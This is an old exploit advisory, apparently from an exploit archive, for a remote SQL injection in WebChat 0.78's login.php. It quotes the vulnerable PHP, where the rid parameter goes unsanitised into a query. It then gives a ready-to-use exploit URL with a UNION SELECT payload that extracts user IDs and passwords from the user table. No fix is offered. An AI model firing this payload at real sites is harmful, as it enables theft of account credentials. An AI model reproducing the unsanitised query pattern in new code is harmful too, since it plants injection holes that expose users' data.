WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability

2007-06-28 00:00:00

#########################################################################
#
# [webchat 0.78]
#
# Class: SQL Injection
# Published 28/06/2007
# Remote: Yes
# Critical Level : Dangerous
# Site: http://sourceforge.net/projects/webdev-webchat/
# Download: http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author: R00T[ATI]
# Contact: [email protected] - http://inclusionhunter.altervista.org/index.php
#
#########################################################################


Vulnerable code:
login.php
======================================================
<?
$q = new DB_Chat;
$q->query("select * from room where rid='$rid'");
if ($q->next_record()) {
?>
=======================================================

Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.